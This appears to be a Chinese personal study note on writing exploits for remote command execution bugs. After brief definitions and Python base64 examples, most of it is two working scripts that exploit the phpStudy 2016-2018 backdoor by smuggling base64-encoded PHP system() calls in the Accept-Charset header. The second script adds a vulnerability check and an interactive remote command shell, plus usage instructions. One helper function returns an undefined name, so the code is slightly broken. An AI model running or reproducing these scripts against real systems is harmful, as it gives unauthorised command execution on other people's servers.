注:个人笔记,非常简陋,仅供参考。
| 名词 | 解释 |
|---|---|
| POC (Proof of Concept) | 漏洞验证代码,验证漏洞的存在性。 |
| EXP (Exploit) | 渗透、攻击; 完整的漏洞利用工具 |
| RCE (Remote Code|Command Execute) | * 漏洞的类型 * 在远程目标上执行代码或命令 |
手工验证漏洞的问题:
- 效率
- 准确性
针对RCE 漏洞开发EXP,常见的RCE 漏洞:
- phpstudy_2016-2018_rce
- seacms_6.26-6.28_rce
- sangfor_edr_3.2.19_rce
- ...
考虑将写好的EXP 集成到pocsuite3 框架中。
常见模块介绍
base64
base64 模块就是用来进行base64 编解码操作的模块。
base64 编码
直接利用模块中函数即可,注意使用二进制形式进行编码。
python
>>> import base64
>>> s = '''system("whoami");'''
>>> base64.b64encode(s.encode()) # .encode() 字符串转换成二进制数据
b'c3lzdGVtKCJ3aG9hbWkiKTs='
>>> base64.b64encode(s.encode()).decode()
'c3lzdGVtKCJ3aG9hbWkiKTs='
>>>base64 解码
直接使用函数即可。
解码不需要转换成二进制
python
>>> import base64
>>> s = "c3lzdGVtKCJ3aG9hbWkiKTs="
>>> base64.b64decode(s)
b'system("whoami");'
>>> base64.b64decode(s).decode()
'system("whoami");'
>>>string
字符集合模块。
python
>>> import string
>>> string.
string.Formatter( string.ascii_uppercase string.octdigits
string.Template( string.capwords( string.printable
string.ascii_letters string.digits string.punctuation
string.ascii_lowercase string.hexdigits string.whitespace
>>> string.printable # 可打印字符
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c'
>>> string.printable.strip()
'0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
>>>常规EXP 编写
phpstudy_2016-2018_rce
漏洞利用脚本
python
# phpstudy_2016-2018_rce
"""
GET /phpinfo.php HTTP/1.1
Host: 10.4.7.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept-Encoding: gzip,deflate
Accept-Charset:
"""
import requests
import base64
url = "http://10.4.7.130/phpinfo.php"
cmd = "net user"
cmd = f"system('{cmd}');"
cmd = base64.b64encode(cmd.encode()).decode()
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
"Accept-Encoding" : "gzip,deflate",
"Accept-Charset" : f"{cmd}"
}
res = requests.get(url = url, headers = headers)
html = res.content.decode("GBK") #windows系统对中文的编码就是GBK编码
offset = html.find("<!DOCTYPE html")
result = html[0:offset]
print(result)进阶脚本
- 漏洞存在性测试:无损;
- 循环执行命令。
python
# phpstudy_2016-2018_rce
import requests
import base64
import sys
import re
import random
import string
banner = """
PHPStudy_2016-2018
( ) ( ) ( )
| |_ _ _ ___ | |/') _| | _ _ _ __
| '_`\ /'_` ) /'___)| , < /'_` | /'_`\ /'_`\ ( '__)
| |_) )( (_| |( (___ | |\`\ ( (_| |( (_) )( (_) )| |
(_,__/'`\__,_)`\____)(_) (_)`\__,_)`\___/'`\___/'(_)
- ZS
Usage: python3 *.py http://10.4.7.130/phpinfo.php
"""
def attack(cmd, url):
cmd = f'''system("{cmd}");'''
cmd = base64.b64encode(cmd.encode()).decode()
headers = {
"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36",
"Accept-Encoding" : "gzip,deflate",
"Accept-Charset" : f"{cmd}"
}
res = requests.get(url = url, headers = headers)
html = res.content.decode()
offset = html.find("<!DOCTYPE html")
result = html[0:offset].strip()
return result
def gen_random_str(l):
s = ""
for i in range(l):
i
s += random.choice(string.ascii_letters)
return sk
def verify(url):
random_str = gen_random_str(32)
cmd = f"echo {random_str}"
if random_str in attack(cmd, url):
return True
else:
return False
if len(sys.argv) < 2:
print(banner)
exit()
url = sys.argv[1]
print(f"Target: {url}")
if not verify(url):
print(f"The Target is NOT VULNERABLE!")
exit()
flag = input(f"The Target is VULNERABLE!\nCould you want to continue?[Y/n]")
if flag == "n":
exit()
info = re.findall(r'http://(.*)/', url)[0]
while True:
cmd = input(f"<{info}> ")
if cmd == "exit":
break
print(attack(cmd, url))